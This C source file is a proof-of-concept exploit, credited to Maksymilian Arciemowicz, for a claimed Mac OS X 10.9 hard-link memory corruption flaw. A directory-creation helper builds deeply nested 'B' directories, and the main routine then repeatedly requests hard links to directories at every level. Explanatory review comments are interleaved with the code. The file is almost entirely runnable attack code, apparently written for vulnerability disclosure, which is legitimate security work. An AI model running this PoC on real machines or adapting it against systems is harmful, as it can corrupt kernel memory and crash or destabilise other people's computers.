#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>
#include <errno.h>
#include <locale.h>
/*
MacOS X 10.9 Hard Link Memory Corruption PoC
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cert.cx/
*/
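/**
 * Create every directory along `path`, in the manner of `mkdir -p`.
 *
 * The string is walked one component at a time: it is cut in place at each
 * '/' so the prefix can be handed to mkdir(), and the '/' is written back
 * afterwards. `path` must therefore point to writable storage.
 *
 * @param path      NUL-terminated path to create; modified temporarily.
 * @param mode      Permission bits for the final component. When this call
 *                  creates the final component it is also chmod()ed to
 *                  `mode`, so the result does not depend on the umask.
 * @param dir_mode  Permission bits for intermediate components.
 * @return 0 on success. -1 on failure, after a warn() diagnostic naming the
 *         failing prefix; a NULL `path` yields -1 with errno set to EINVAL.
 *
 * A component that already exists is accepted only if stat() reports a
 * directory; stat() follows symbolic links, so a link to a directory passes.
 * The mkdir()/stat() pair is not atomic with respect to other processes.
 */
int mkpath(char *path, mode_t mode, mode_t dir_mode)
{
    struct stat sb;
    char *slash;
    int done;
    int rv = 0;

    /* The original dereferenced path unconditionally. */
    if (path == NULL) {
        errno = EINVAL;
        return -1;
    }

    slash = path;
    for (;;) {
        /* Skip any run of separators, then advance to the end of the component. */
        slash += strspn(slash, "/");
        slash += strcspn(slash, "/");
        done = (*slash == '\0');
        *slash = '\0';

        if (mkdir(path, done ? mode : dir_mode) < 0) {
            /* Keep mkdir()'s errno: stat() below may overwrite it. */
            int sverrno = errno;

            if (stat(path, &sb) < 0) {
                errno = sverrno;
                warn("%s", path);
                rv = -1;
            } else if (!S_ISDIR(sb.st_mode)) {
                errno = ENOTDIR;
                warn("%s", path);
                rv = -1;
            }
        } else if (done) {
            /* Freshly created leaf: apply the exact requested mode. */
            if (chmod(path, mode) == -1) {
                warn("%s", path);
                rv = -1;
            }
        }

        /*
         * Put the separator back on every exit path, so a failure no longer
         * leaves the caller's buffer truncated at the failing component.
         * When done is set, slash points at the real terminator.
         */
        if (!done) {
            *slash = '/';
        }
        if (done || rv < 0) {
            break;
        }
    }
    return rv;
}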
/*
 * PoC driver. Builds a chain of nested directories, each named "B", below the
 * current working directory, then climbs back up the chain and at every level
 * calls link() eight times with the directory path "B/B" as the link source.
 *
 * argv[1] is the requested nesting depth. It is parsed with atoi(), so input
 * that does not start with a number becomes 0 and both for-loops are skipped.
 *
 * Side effects visible in this function: the process umask is set to 0 and not
 * restored, the working directory is changed, and the "B" tree plus any
 * X1..X8 links that succeed are left on disk. Everything is created relative
 * to the directory the program is started in; nothing is cleaned up.
 *
 * Returns 1 on a wrong argument count, otherwise 0 even if calls failed.
 */
int main(int argc, char *argv[]){
if(argc!=2){
printf("Use it with (int)arg[1]\n");
return 1;
}
int wbita=atoi(argv[1]);
/* Link names used at every level. The explicit \0 is redundant: each literal
   already ends in a NUL, so the arrays carry two terminators. */
char symn1[]="X1\0";
char symn2[]="X2\0";
char symn3[]="X3\0";
char symn4[]="X4\0";
char symn5[]="X5\0";
char symn6[]="X6\0";
char symn7[]="X7\0";
char symn8[]="X8\0";
char buff[]="B\0";
char cd[]="..\0";
char *sym;
/* fp is declared but never used in this function. */
FILE *fp;
int level=0;
mode_t mode,dir_mode;
/* (strlen("B")*2)+2 = 4 bytes: room for "B/B" and its NUL. The result is not
   checked for NULL before the strcpy() below, and it is never freed. */
sym=malloc(((strlen(buff)*2)+2)*sizeof(char));
/* umask(0) returns the previous mask and leaves the process mask at 0, so
   mode is 0777 filtered by the mask the program was started with. */
mode = ((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0));
dir_mode = mode | S_IWUSR |S_IXUSR;
/* mkpath() return values are ignored throughout this function. */
mkpath(buff,mode,dir_mode);
/* Phase 0: descend through every "B" that already exists (for example from an
   earlier run), counting the levels entered, until chdir() fails. */
while(1) // Phase 0
if(0!=chdir(buff)){
printf("Phase 0 done\n");
break;
}
else printf("Next %i\n",level++);
/* sym = "B/B": a relative path naming a directory one level below a "B". */
strcpy(sym,buff);
strcat(sym,"/");
strcat(sym,buff);
/* Extend the chain from the depth found in phase 0 up to wbita levels. */
for(int ax=level; ax<wbita; ax++){
mkpath(buff,mode,dir_mode);
printf("Directory created Level: %i\n",ax);
if(0!=chdir(buff)){
printf("Error. chdir() failed.");
break;
}
}
/* Create B and B/B below the current directory and step back up one level,
   so that "B/B" resolves from here. The chdir() results are not checked. */
mkpath(buff,mode,dir_mode);
chdir(buff);
mkpath(buff,mode,dir_mode);
chdir(cd);
/* Link loop: at each level request eight hard links X1..X8 to "B/B", then move
   one directory up. Because sym names a directory, every call asks for a hard
   link to a directory. The printed value is link()'s return (0 on success,
   -1 on failure); errno is not reported.
   NOTE(review): the file header attributes the memory corruption to
   Mac OS X 10.9; systems that refuse directory hard links are expected to
   print -1 here - confirm on the platform under test. */
for(int ax=level; ax<wbita; ax++){
printf("Link1(%s,%s)=%i; cd ..\n",sym,symn1,link(sym,symn1));
printf("Link2(%s,%s)=%i; cd ..\n",sym,symn2,link(sym,symn2));
printf("Link3(%s,%s)=%i; cd ..\n",sym,symn3,link(sym,symn3));
printf("Link4(%s,%s)=%i; cd ..\n",sym,symn4,link(sym,symn4));
printf("Link5(%s,%s)=%i; cd ..\n",sym,symn5,link(sym,symn5));
printf("Link6(%s,%s)=%i; cd ..\n",sym,symn6,link(sym,symn6));
printf("Link7(%s,%s)=%i; cd ..\n",sym,symn7,link(sym,symn7));
printf("Link8(%s,%s)=%i; cd ..\n",sym,symn8,link(sym,symn8));
if(0!=chdir(cd)){
printf("Error. chdir failed!");
break;
}
}
return 0;
}